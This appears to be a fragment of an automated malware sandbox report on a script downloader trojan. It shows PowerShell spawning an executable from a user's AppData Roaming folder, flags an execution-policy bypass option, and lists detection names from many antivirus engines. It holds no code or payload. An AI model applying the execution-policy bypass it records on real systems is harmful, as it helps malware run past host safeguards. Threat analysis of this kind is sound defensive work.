parent_process powershell.exe martian_process C:\Users\test22\AppData\Roaming\rooma.exe
parent_process powershell.exe martian_process "C:\Users\test22\AppData\Roaming\rooma.exe"
option -executionpolicy unrestricted value Attempts to bypass execution policy
option -executionpolicy unrestricted value Attempts to bypass execution policy
Lionic Trojan.Script.Valyria.a!c
Cynet Malicious (score: 99)
Skyhigh HTA/Downloader.f
McAfee HTA/Downloader.f
VIPRE VB:Trojan.Valyria.7482
Arcabit VB:Trojan.Valyria.D1D3A
Symantec Trojan.Gen.NPE
ESET-NOD32 VBS/Agent.QVR
Avast Script:SNH-gen [Drp]
Kaspersky HEUR:Trojan-Downloader.Script.Generic
BitDefender VB:Trojan.Valyria.7482
NANO-Antivirus Trojan.Script.Downloader.jpdglv
MicroWorld-eScan VB:Trojan.Valyria.7482
Rising Downloader.Agent/VBS!8.10EA5 (TOPIS:E0:RXmrIh5jYAI)
Emsisoft VB:Trojan.Valyria.7482 (B)
F-Secure Malware.VBS/Dldr.Agent.VPLT
FireEye VB:Trojan.Valyria.7482
Ikarus Win32.Outbreak
Google Detected
Avira VBS/Dldr.Agent.VPLT
Kingsoft Win32.Infected.AutoInfector.a
GData VB:Trojan.Valyria.7482
Varist VBS/Agent.AZC!Eldorado
Tencent Script.Trojan-Downloader.Generic.Ymhl
MAX malware (ai score=88)
Fortinet VBS/Agent.BSD!tr
AVG Script:SNH-gen [Drp]
file C:\Users\test22\AppData\Roaming\rooma.exe